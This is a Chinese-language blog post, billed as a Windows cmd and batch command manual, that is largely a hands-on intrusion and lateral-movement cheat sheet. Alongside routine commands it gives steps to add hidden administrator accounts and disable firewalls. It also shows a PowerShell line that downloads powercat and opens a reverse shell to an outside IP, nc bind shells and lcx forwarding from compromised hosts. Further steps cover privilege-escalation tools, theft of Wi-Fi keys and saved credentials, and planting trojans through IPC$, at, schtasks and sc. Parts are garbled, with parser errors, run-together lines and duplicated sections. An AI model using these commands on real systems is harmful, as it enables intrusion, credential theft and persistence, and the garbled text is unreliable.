Windows操作系统cmd/Dos批处理命令与脚本手册bat
Windows操作系統命令與腳本總結
- 管理員權限:
- 添加賬號并加入管理員組
- 添加用戶至遠程桌面組
- 允許修改密碼
- 防火墻 :
- 關閉防火墻
- 匹配出注冊表信息中的軟件:
- 獲取完整補丁信息(比systeminfo全):
- 獲取系統和版本信息
- 顯示本地或遠程機器上當前運行的進程列表。
- 操作系統 服務命令列表
- chkdsk.exe 磁盤檢查
- 開3389端口
- systeminfo
- 獲取NETBIOS主機名
- ping 測試網絡連接
- net account
- net computer 添加或者刪除域數據庫中的計算機,
- telnet命令進行遠程登陸
- 使用ftp命令進行數據傳輸
- 使用netstat命令查看網絡連接的相關信息
- tracert 查看IP數據報的傳輸路徑
- IPC$入侵與防范
- copy復制一份或多份文件
- 網絡
- ipconfig 顯示本地IP地址
- netstat -anp/ano
- 查看路由表及所有可用接口的arp緩存表
- powershell
- dir 用于顯示目錄的文件和子目錄的列表
- type顯示文本文件的內容
- at用于顯示或創建計劃任務
- schtasks命令
- sc是用于與服務控制管理器和服務進行通信的命令行程序。
- cls 指電腦cmd命令提示符中用來清除屏幕的命令
管理員權限:
添加賬號并加入管理員組
net user admin1 admin1 /add & net localgroup administrators admin1 /add添加用戶至遠程桌面組
net localgroup “Remote Desktop Users” aming /add
#此組中的成員被授予遠程登錄的權限
允許修改密碼
net user 用戶名 /passwordchg:yes
防火墻 :
關閉防火墻
netsh firewall set opmode mode=disable添加防火墻規則,允許 3389 端口通信:
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow匹配出注冊表信息中的軟件:
find “DisplayName” reg.txt |find /V “ParentDisplayName” > tmplist.txt
獲取完整補丁信息(比systeminfo全):
wmic qfe list
獲取系統和版本信息
systeminfo | findstr /B /I /C:“os name” /C: “OS Version”/B: 在一行開始匹配,
/I:不區分大小寫
/C:string :使用指定的字符串作為文字搜索字符串
如果是中文操作系統,輸入如下命令
systeminfo | findstr /B /I /C:“os 名稱” /C: “OS 版本”4,查看系統體系結構
echo %processor_architecture%
5,查看安裝的軟件及版本、路徑等
wmic product get name,version
6,利用powershell命令,收集軟件版本信息,具體如下
powershell “get-wmiobject -class win32_product | select-object -property name,version”
7,查詢本機服務信息
wmic service list brief
顯示本地或遠程機器上當前運行的進程列表。
一般情況下我們都是通過tasklist查看系統當前正在運行的進程,然后通過tskill來關閉。
tasklill xxxx tasklist /vtasklit /S 192.168.10.1 /U administrator /P Admin@123 //列出DC上運行的進程/S 指定IP地址 /U 指定哪個用戶執行這個命令 /P 指定該用戶密碼wmic process list brief
9,查看啟動程序信息
wmic startup get command,caption
10,查看計劃任務
schtasks /query /fo list /v
11,查看主機開機時間
net statistics workstation
12,查詢用戶列表
net user
13,獲取本地管理員組的信息
net localgroup administrators
14,查看當前在線用戶
query user || qwinsta
15,列出或斷開本地計算機和連接的客戶端的會話
net session
16,查詢端口列表
netstat -ano
17 ,查詢補丁信息
systeminfo
18,使用wmic 識別安裝系統中的補丁情況
wmic qfe get Caption,Description,HotFixID,InstalledOn
19,查詢本機共享,命令如下
net share
利用wmic 查找共享,命令如下
wmic share get name,path,status
21,關閉防火墻命令
#windows server 2003 系統之前版本,命令如下:
netsh firewall set opmode disable
#windows server 2003 之后的系統版本
netsh advfirewall set allprofiles state off
22,查看防火墻配置
netsh firewall show config
23,修改防火墻配置
#windows server 2003 系統之前版本,命令如下:
netsh firewall add allowedprogram c:\nc.exe “allow nc” enable
#windows server 2003 之后的系統版本,允許指定程序連入
netsh advfirewall firewall add rule name=“pass nc” dir=in action=allow program=“c:\nc.exe”
允許指定程序連出 ,命令如下
netsh advfirewall firewall add rule name=“allow nc” dir=out action=allow program=“c:\nc.exe”
允許3389端口放行,命令如下
netsh advfirewall firewall add rule name=“remote Desktop” protocol=tcp dir=in localport =3389 action=allow
24,查看計算機代理配置情況
reg query “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings”
25,查詢并開啟遠程連接服務
REG QUERY “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /V PortNumber
#在windows 2003中開啟3389
wmic path win32_terminalservicesetting where (__CLASS !=“”) call setallowtsconnections 1
#在windows2008和widnows 2012中開啟3389
wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !=“”) call setallowtsconnections 1
wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName=‘RDP-Tcp’) call setuserauthenticationrequired 1
reg add “HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER” /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
域相關
查詢當前登陸域:
net config workstation
set log
echo %logonserver%
查詢域控制器主機名:
net group “domain controllers” /domain
nltest /dclist:域
查詢域管名字:net group “domain admins” /domain
查看當前域機器列表:net group “domain computers” /domain
查詢當前所有域用戶: net user /domain
當前域分組情況:net group /domain
查看共享目錄:net share
查看當前在線用戶:query user || qwinsta
查看遠程計算機tasklist:tasklist /S ip /U domain\username /P /V
查看本機殺軟:WMIC /Node:localhost /Namespace:\root\SecurityCenter2 Path AntivirusProduct Get displayName
遠程桌面連接記錄:cmdkey /l
本機已安裝程序:wmic product get name,version
本機相關信息
Windows
查看當前用戶權限:whoami /all
查看當前用戶是否屬于管理組:net localgroup administrators && whoami
查看當前系統是否為虛擬機:systeminfo | findstr /i “System Model”
本機配置信息:systeminfo
本機任務列表:tasklist
查看已安裝軟件:
對外已開啟端口服務:netstat -ano
獲取系統注冊的服務信息:sc query state= all
查看本機保存的登陸憑證:cmdkey /l
查看防火墻狀態:netsh advfirewall show allprofiles
查看連過的WIFI:netsh wlan show profiles
查看wifi的密碼:netsh wlan show profile name=“wifi名稱” key=clear
查看RDP連接憑證:dir /a %userprofile%\AppData\Local\Microsoft\Credentials*
查看域內某臺主機詳情:net view /domain:XXX
獲取域里面所有機子的本地管理員賬號密碼:dir /s /a \域控IP\SYSVOL*.xml
powershell
powershell IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1’); powercat -c 101.35.124.140 -p 6666 -e cmd
操作系統 TTL
LINUX 64
WIN2K/NT 128
WINDOWS 系列 32
52 win
UNIX 系列 255
wmic qfe GET hotfixid | findstr /C:"KB4012212
explorer
操作系統 服務命令列表
- winver---------檢查windows版本
wmimgmt.msc----打開windows管理體系結構(wmi)
wupdmgr Windows更新程序
wscript Windows腳本宿主設置
文檔
https://docs.microsoft.com/zh-cn/windows-server/administration/windows-commands/wscript
write----------寫字板
winmsd---------系統信息
wiaacmgr-------掃描儀和照相機向導
winchat--------xp自帶局域網聊天
mem.exe--------顯示內存使用情況
msconfig.exe---系統配置實用程序
mplayer2-------簡易 widnowsmediaplayer 媒體播放機
mspaint--------畫圖板
mstsc----------遠程桌面連接
magnify--------放大鏡實用程序
mmc------------打開控制臺
mobsync--------同步命令
dxdiag---------檢查directx信息
drwtsn32------系統醫生
devmgmt.msc---設備管理器
dfrg.msc-------磁盤碎片整理程序
diskmgmt.msc---磁盤管理實用程序
dcomcnfg-------打開系統組件服務
ddeshare-------打開dde共享設置
dvdplay--------dvd播放器
nslookup-------ip地址偵測器
netstopmessenger-----停止信使服務
netstartmessenger----開始信使服務
notepad--------打開記事本
nslookup-------網絡管理的工具向導
ntbackup-------系統備份和還原
narrator-------屏幕“講述人”
ntmsmgr.msc----移動存儲管理器
ntmsoprq.msc---移動存儲管理員操作請求
netstat-an----(tc)命令檢查接口
syncapp--------創建一個公文包
sysedit--------系統配置編輯器
sigverif-------文件簽名驗證程序
sndrec32-------錄音機
shrpubw--------創建共享文件夾
secpol.msc-----本地安全策略
syskey---------系統加密,一旦加密就不能解開,保護windowsxp系統的雙重密碼
services.msc---本地服務設置
sndvol32-------音量控制程序
sfc.exe--------系統文件檢查器
sfc/scannow---windows文件保護(掃描錯誤并復原)
tsshutdn-------60秒倒計時關機命令
tourstart------xp簡介(安裝完成后出現的漫游xp程序)
taskmgr--------任務管理器(2000/xp/2003)
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打開資源管理器
packager-------對象包裝程序
perfmon.msc----計算機性能監測程序
progman--------程序管理器
regedit.exe----注冊表
rsop.msc-------組策略結果集
regedt32-------注冊表編輯器
rononce-p----15秒關機
regsvr32/u*.dll----停止dll文件運行
regsvr32/uzipfldr.dll------取消zip支持
cmd.exe--------cmd命令提示符
chkdsk.exe 磁盤檢查
chkdsk F: /fcertmgr.msc----證書管理實用程序
calc-----------啟動計算器
charmap--------啟動字符映射表
cliconfg-------sqlserver客戶端網絡實用程序
clipbrd--------剪貼板查看器
conf-----------啟動netmeeting
compmgmt.msc---計算機管理
cleanmgr-------LJ整理
ciadv.msc------索引服務程序
osk------------打開屏幕鍵盤
odbcad32-------odbc數據源管理器
oobe/msoobe/a----檢查xp是否激活
lusrmgr.msc----本機用戶和組
logoff---------注銷命令
iexpress-------木馬捆綁工具,系統自帶
fsmgmt.msc-----共享文件夾管理器
utilman--------輔助工具管理器
gpedit.msc-----組策略
CMD部分提權常用命令
whoami net user 查看所有用戶列表 echo %username% systeminfo net user admin password /add net localgroup Administrators admin /add net start telnet 開telnet服務 net use z:127.0.0.1c$ 映射對方的C盤 attrib 隱藏文件開3389端口
- Windows 控制臺注冊表工具調用3.0注冊表的一個命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add /? 查看 命令 使用方法 REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f] KeyName [\\Machine\]FullKeyREG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f][/reg:32 | /reg:64]KeyName [\\Machine\]FullKeyMachine 遠程機器名 - 忽略默認到當前機器。遠程機器上只有 HKLM 和 HKU 可用。FullKey ROOTKEY\SubKeyROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]SubKey 所選 ROOTKEY 下注冊表項的完整名稱。/v 所選項之下要添加的值名稱。/ve 為注冊表項添加空白值名稱(默認)。/t RegKey 數據類型[ REG_SZ | REG_MULTI_SZ | REG_EXPAND_SZ |REG_DWORD | REG_QWORD | REG_BINARY | REG_NONE ]如果忽略,則采用 REG_SZ。/s 指定一個在 REG_MULTI_SZ 數據字符串中用作分隔符的字符如果忽略,則將 "\0" 用作分隔符。/d 要分配給添加的注冊表 ValueName 的數據。/f 不用提示就強行覆蓋現有注冊表項。/reg:32 指定應該使用 32 位注冊表視圖訪問的注冊表項。/reg:64 指定應該使用 64 位注冊表視圖訪問的注冊表項。例如:REG ADD \\ABC\HKLM\Software\MyCo添加遠程機器 ABC 上的一個注冊表項 HKLM\Software\MyCoREG ADD HKLM\Software\MyCo /v Data /t REG_BINARY /d fe340ead添加一個值(名稱: Data,類型: REG_BINARY,數據: fe340ead)REG ADD HKLM\Software\MyCo /v MRU /t REG_MULTI_SZ /d fax\0mail添加一個值(名稱: MRU,類型: REG_MULTI_SZ,數據: fax\0mail\0\0)REG ADD HKLM\Software\MyCo /v Path /t REG_EXPAND_SZ /d ^%systemroot^%添加一個值(名稱: Path,類型: REG_EXPAND_SZ,數據: %systemroot%)注意: 在擴充字符串中使用插入符號 ( ^ )查終端端口
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
巴西烤肉 Churrasco.exe “命令”
使用方法:
C:\RECYCLER\Churrasco.exe “net user xiaoma xiaoma /add && net localgroup administrators xiaoma /add”
C:\RECYCLER\Churrasco.exe “net user admin$ /del” 刪除帳號
query user 查看會話
logoff ID號 踢掉
C:\RECYCLER\Churrasco.exe “logoff 1”
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
NC反彈
路徑\nc.exe -l -p 端口 -t -e 路徑\cmd.exe
c:\RECYCLER\nc.exe -l -p 1234 -t -e c:\RECYCLER\cmd.exe
NC上傳
DOS界面下運行:
NC -vv www.baidu.com 80<1.txt
-vv: 回顯
80: www端口
1.txt: 就是你要發送的數據包
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
LCX端口轉發
先本地監聽51端口 lcx.exe -listen 51 3389
c:\recycler\lcx.exe -slave 自己的ip 51 肉雞IP 3389 LCX轉發
c:\recycler\lcx.exe -slave 222.222.222.222 51 111.111.111.111 3389
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
360提權
1.開啟終端服務,端口為3389;用法:360.exe “port”
2.替換5下shift為cmd;用法:360.exe “sethc”
====================================================================
gethash使用
C:\RECYCLER\gethash.exe $local
=========================================================================
pr提權
c:\recycler\cmd.exe
c:\recycler\pr.exe
pr.exe “net user xiaoma xiaoma /add & net localgroup administrators xiaoma /add”
================================================================================
rar.exe打包命令
cmd.exe /c “\Program Files\winrar\rar.exe” a -r d:\wwwroot\1.rar d:\wwwroot
@查詢存在關系的機器
Net view
@查詢有幾個域
nei view /damin
@查看 testdomain域中的計算機列表
net view /domain:testdomain
@查詢域內的組
net group /domain
@劃分網段
dsquery subnet
@查詢域內用戶
net user /domain
@查詢域內組信息
net group /domain
@查詢域管理用戶組
net group “domain admins” /domain
@查看管理員登陸時間,密碼過期時間,是否有登陸腳本,組分配等信息!
net user domain-admin /domain
@查詢域內計算機
net group “domain computers” /domain
@判斷機器屬于哪個域
net config Workstation
@判斷主域.主域服務器都做時間服務器
net time /domian //這招是在LCX牛的文章里面學會的
net group “domain admins” /domain
@ipc域內連接
net use \IP\ipc$ password /user:username@domain
====
猜測內網結構的一些命令和工具
====
tracert 10.1.0.1
ping x.x.x.x
nbtscan -r 192.168.16.0/24
@掃描某個段的一些東西 //感謝玫瑰大叔的工具。感謝貓師傅給我說這個東東
hd.exe -hscan 10.0.0.1-10.0.0.255 /a /t 200
還有一個內網結構圖形化表現工具
dude ///感謝影叔 感謝LInux520群得朋友說
還有一部分沒有整理。過段時間在發上來吧~ 歡迎各位牛一起交流內網滲透。
systeminfo
獲取NETBIOS主機名
- ping -a IP
ping 測試網絡連接
net account
- net命令管理網絡環境
該命令用于
更新用戶的賬戶數據庫,
并且為所有賬戶修改密碼和登錄需求,
如:強制用戶在時間到期之后多久必須注銷、
密碼最長/短使用期限、密碼長度下限、鎖定閾值、鎖定持續時間、
鎖定觀測窗口和計算機角色等詳細信息
format:
“net accounts [/forcelogoff:{minutes|no}][/minpwlen:length][/maxpwage:{days|unlimited}][/minpwage:days][/uniquepw:number][/sync][/domain]”
?
for example:
“net accounts”
net computer 添加或者刪除域數據庫中的計算機,
所有計算機的添加和刪除都會轉發到主域控制器
format:“net computer \computername {/add|/del}”
- net config
該命令用于顯示工作站或服務器服務的配置消息,
或者顯示并更改某項服務的設置
- net config workstation
命令用于顯示更改配置工作站服務參數,更改立即生效并永久保持
format:“net config workstation [/charcount:bytes][/chartime:msec][/charwait:sec]”
- net continue
該命令能用重新激活掛起的服務
format:“net continue service”
- net file
用于顯示某種服務器上所有打開的共享文件夾及鎖定文件夾數,
也可以關閉個別文件并取消文件鎖定
- net group
用于Windows NT Server域中添加、更改或顯示全局組,
僅在Windows NT Server域中可用
format:
“net group [groupname [/comment:“text”]][/domain]
net group groupname {/add[/comment:“text”]|delete}[/domain]
net group groupname username[…]{/add|/delete}[/domain]”
- net help
該命令用于提供網絡命令列表及幫助主題,
format:“net help [command] net command {/help|/?}”
- net localgroup
用于顯示、刪除或更改本地組
format:
“net localgroup [groupname [/comment:“text”]][/domain]
net localgroup groupname{/add [/comment:“text”]|/delete}[/domain]
net localgroup groupname name[…]{/add|/delete}[/domain]”
- net name
用于添加或刪除消息名(有時稱別名),或顯示計算機接受消息的列表。要使用該命令則必須先運行信使服務
format:”net name[name [/add|/delete]]“
- net print
用于顯示或控制打印作業及打印隊列
format:”net print \computername
net print \sharename
net print [\computername] job# [/hold|/release|/delete]“
- net session
用于列出或斷開本地計算機和與之連接的客戶端會話
format:”net session [\computername][/delete]“
- net send
用于向網絡的其他用戶、計算機發送消息。要接受消息必須運行信使服務
format:”net send {name|*|/domain[:name]|/users} message“
- net share
用于創建、刪除或顯示共享資源
format:”net share sharename
net share sharename=drive:path [/users:number|/unlimited][/remark:“text”]
net share sharename [/users:number|unlimited][/remark:“text”]
net share {sharename|drive:path} /delete“
- net time
用于時計算機的時間與另一臺計算機或域的時間同步。
不帶/set參數時,將顯示另外一臺計算機或域的時間
format:”net time [\computername|/domain[:name]][/set]“
telnet命令進行遠程登陸
格式
format:”telnet ip地址/主機名稱“
步驟
輸入”telnet 主機名/ip地址“啟動telnet會話
一旦telnet成功連接到遠程計算機上,就顯示登陸信息并提示用戶輸入用戶名和口令
如果輸入正確就能成功的登錄并在遠程計算機上工作
使用ftp命令進行數據傳輸
格式
format:”ftp -v -d -l -n -g [主機名]“
使用netstat命令查看網絡連接的相關信息
使用netstat -a命令:顯示所有連接和端口
使用netstat -b命令:顯示包含創建每個連接或者監聽端口的可執行文件
使用netstat -e命令:顯示以太網數據統計,可以結合-s使用
使用netstat -n命令:能以網絡IP地址代替名稱,顯示網絡連接情形
netstat /help查看命令幫助。。。
tracert 查看IP數據報的傳輸路徑
tracert是路由跟蹤實用程序, 用于確定IP數據包訪問目標所采取的路徑
format:
tracert [-d][-h maximum_hops][-j host-list][-w timeout] targer_name for example: tracert 主機名IPC$入侵與防范
建立IPC$連接
format:“net use \IP\ipc$ Password/user:Admin”
?
IP:目標ip地址
Password:目標計算機密碼
Admin:目標計算機用戶名
建立映射
format:“net use z:\IP\c$”
?
\IP\c $ 表示目標電腦上的C盤,符號$表示隱藏的共享,
z:表示將遠程主機的C盤映射為本地磁盤的盤符
查看遠程連接
format:“net use * /del”
空連接漏洞
format:“net use \ip “” /user:“” ” --注意一共有四個空格 引號不能少
IPC$連接原本是要求客戶機具有足夠的權限才能連接到主機,
然而該漏洞允許客戶端使用空用戶名和密碼就可以與目標主機成功建立連接。
雖然這樣無法執行管理類操作,
既不能映射網絡驅動器、上傳文件、執行腳本命令,
但是卻可以用來探測目標主機中的一些信息。
?
Telnet入侵
使用telnet入侵前必須建立IPC$連接,
建立連接是為了方便開啟遠程計算機中被禁用的telnet服務
format:“sc \ip config tlntsvr start=auto” --用sc命令把禁用的telnet服務變成自動
“sc \ip start tlntsvr” --用sc命令啟動telnet服務
“telnet ip” --登錄telnet
“net share” --查看默認共享
“net share sharename=drive:path” --建立cKaTeX parse error: Undefined control sequence: \1 at position 18: … “copy \?1?.txt \\ip\c” --copy命令上傳木馬 這里是把命令行切到c盤下了,1.txt在C盤根目錄
“at \ip time cmd” --at命令定時執行 time參數為時間 cmd為上傳到目標主機共享的程序名 即木馬
“net user 用戶名 密碼 /add” --添加用戶
“net localgroup administrators 用戶名 /add” --為上一步添加的用戶名加入工作組
注意:如果對方采用了NTLM認證策略,
可以連接網絡注冊表修改
HKEYLOCAL\MACHINE\SOFTWARE\MICROSOFT\TELNETSERVERf\1.0 下的
NTLM鍵值由2改成0,然后重啟telnet服務
?
copy復制一份或多份文件
copy C:\test.txt \\192.168.10.1\c$ //將test.txt文件復制到DC的C盤目錄下(可復制木馬等) copy 1.jpg /b + 1.jsp /a 2.jpg //生成圖片馬?
通過注冊表入侵
Windows注冊表是幫助
Widnows控制軟硬件 、用戶環境和Windows界面的一套數據文件,
入侵者可在注冊表編輯器中
通過連接網絡注冊表進入遠程計算機的注冊表并進行實時監控。
如果想阻止該入侵,只需要關閉Remote Registry服務
網絡
ipconfig 顯示本地IP地址
netstat -anp/ano
netstat -ano -p tcp | find “:3389” >nul 2>nul && echo 3389端口開啟!|| echo 3389 no!
查看路由表及所有可用接口的arp緩存表
arp -a
route print
tasklist /v
net user
#添加用戶
net user aming HackamingMM /add
#添加用戶至管理員組
net localgroup “administrators” 用戶名 /add
#添加用戶至遠程桌面組
net localgroup “Remote Desktop Users” 用戶名 /add #此組中的成員被授予遠程登錄的權限
#允許修改密碼 net user 用戶名 /passwordchg:yes
wmic qfe GET hotfixid | findstr /C:"KB4012212
explorer
4,查看系統體系結構
echo %processor_architecture%
5,查看安裝的軟件及版本、路徑等
wmic product get name,version
powershell
收集軟件版本信息,具體如下
powershell “get-wmiobject -class win32_product | select-object -property name,version”
7,查詢本機服務信息
wmic service list brief
8,查詢進程列表
tasklist /v
wmic process list brief
9,查看啟動程序信息
wmic startup get command,caption
10,查看計劃任務
schtasks /query /fo list /v
11,查看主機開機時間
net statistics workstation
12,查詢用戶列表
net user
13,獲取本地管理員組的信息
net localgroup administrators
14,查看當前在線用戶
query user || qwinsta
15,列出或斷開本地計算機和連接的客戶端的會話
net session
16,查詢端口列表
netstat -ano
17 ,查詢補丁信息
systeminfo
18,使用wmic 識別安裝系統中的補丁情況
wmic qfe get Caption,Description,HotFixID,InstalledOn
19,查詢本機共享,命令如下
net share
利用wmic 查找共享,命令如下
wmic share get name,path,status
21,關閉防火墻命令
#windows server 2003 系統之前版本,命令如下:
netsh firewall set opmode disable
#windows server 2003 之后的系統版本
netsh advfirewall set allprofiles state off
22,查看防火墻配置
netsh firewall show config
23,修改防火墻配置
#windows server 2003 系統之前版本,命令如下:
netsh firewall add allowedprogram c:\nc.exe “allow nc” enable
#windows server 2003 之后的系統版本,允許指定程序連入
netsh advfirewall firewall add rule name=“pass nc” dir=in action=allow program=“c:\nc.exe”
允許指定程序連出 ,命令如下
netsh advfirewall firewall add rule name=“allow nc” dir=out action=allow program=“c:\nc.exe”
允許3389端口放行,命令如下
netsh advfirewall firewall add rule name=“remote Desktop” protocol=tcp dir=in localport =3389 action=allow
24,查看計算機代理配置情況
reg query “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings”
25,查詢并開啟遠程連接服務
REG QUERY “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /V PortNumber
#在windows 2003中開啟3389
#在windows2008和widnows 2012中開啟3389
wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1 wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName=‘RDP-Tcp’) call setuserauthenticationrequired 1reg add “HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER” /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
域相關 查詢當前登陸域: net config workstation set log echo %logonserver% 查詢域控制器主機名: net group "domain controllers" /domain nltest /dclist:域 查詢域管名字:net group "domain admins" /domain 查看當前域機器列表:net group "domain computers" /domain 查詢當前所有域用戶: net user /domain 當前域分組情況:net group /domain 查看共享目錄:net share 查看當前在線用戶:query user || qwinsta 查看遠程計算機tasklist:tasklist /S ip /U domain\username /P /V 查看本機殺軟:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName 遠程桌面連接記錄:cmdkey /l 本機已安裝程序:wmic product get name,version 本機相關信息 Windows 查看當前用戶權限:whoami /all 查看當前用戶是否屬于管理組:net localgroup administrators && whoami 查看當前系統是否為虛擬機:systeminfo | findstr /i "System Model" 本機配置信息:systeminfo 本機任務列表:tasklist 查看已安裝軟件: 對外已開啟端口服務:netstat -ano 獲取系統注冊的服務信息:sc query state= all 查看本機保存的登陸憑證:cmdkey /l 查看防火墻狀態:netsh advfirewall show allprofiles 查看連過的WIFI:netsh wlan show profiles 查看wifi的密碼:netsh wlan show profile name="wifi名稱" key=clear 查看RDP連接憑證:dir /a %userprofile%\AppData\Local\Microsoft\Credentials* 查看域內某臺主機詳情:net view /domain:XXX 獲取域里面所有機子的本地管理員賬號密碼:dir /s /a \域控IP\SYSVOL*.xmlLinux 查看當前用戶:whoami 查看所有用戶:cat /etc/passwd 查看用戶所屬組:id 查看當前系統是否為虛擬機:systemd-detect-virt 查看linux發行版本:cat /etc/redhat-release 查看系統內核版本:cat /proc/version 查看系統詳細信息:uname -a 本機進程列表:ps -ef 對外已開啟端口服務:netstat -anp 查看iptables規則:iptables -nvL 查看selinux開啟狀態:getenforce 查看用戶歷史命令: cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history 查詢已安裝軟件:rpm -qa 查看所有用戶計劃任務:ls /var/spool/cron/dir 用于顯示目錄的文件和子目錄的列表
dir \\192.168.10.1\c$ //列出DC上C盤的文件type顯示文本文件的內容
type \\192.168.10.1\c$\test.txt //讀取目標機器上的文件at用于顯示或創建計劃任務
可通過at命令設置計劃任務執行命令,將結果寫入文件中,
然后通過type讀取文件 時間可通過net time來獲取
也可設置定時任務來執行木馬文件
通過copy等方法將木馬文件上傳至目標機器
通過at來設置計劃任務即可
at \\192.168.10.1 15:20:30 c:\artifact.exe刪除計劃任務
at \\[IP] [ID] /delete //在新建計劃任務時會提示ID是多少或直接執行at可看計劃任務ID at \\192.168.10.1 1 /delete
schtasks命令
自Windows Vista、Windows Server 2008之后版本已經將at命令廢棄了,
可使用schtasks命令代替,schtasks比at更靈活、自由.
常用參數:
/create 創建新計劃任務
/query 列出所有計劃任務
/delete 刪除計劃任務
/run 運行計劃任務
/s 指定目標機器
/u 指定用戶名
/p 指定木馬
/tn 指定計劃任務名稱
/sc 指定計劃頻率(MINUTE、 HOURLY、DAILY、WEEKLY、MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE, ONEVENT)
/tr 指定任務運行程序的路徑
/ru 指定任務運行權限( “”、“NT AUTHORITY\SYSTEM” 或"SYSTEM")
/st 指定運行任務的開始時間
在目標機器上創建一個名為test的計劃任務,
該計劃任務在開機時啟動,啟動程序為C盤下的artifact.exe,
啟動權限為system
查看名為test的任務
schtasks /query /s 192.168.10.1 /u administrator /p "Admin@123" /tn "test"
刪除計劃任務
在使用schtasks命令時,會在系統中留下日志C:\windows\tasks\schedlgu.txt
sc是用于與服務控制管理器和服務進行通信的命令行程序。
利用sc進行橫向流程:
與目標機器建立ipc連接
將木馬文件上傳至目標機器
通過sc創建一個名為test的服務
啟動test服務即可
刪除創建的服務
sc \\[IP] delete [ServerName] sc \\192.168.10.1 delete test通過設置服務來關閉防火墻
sc \\192.168.10.1 create unablefirewall binpath= "netsh advfirewall set allprofiles state off" sc \\192.168.19.1 start unablefirewallcls 指電腦cmd命令提示符中用來清除屏幕的命令
總結
以上是生活随笔為你收集整理的Windows操作系统cmd/Dos批处理命令与脚本手册bat的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: STM32(HAL库 标准库通用) AS
- 下一篇: java信息管理系统总结_java实现科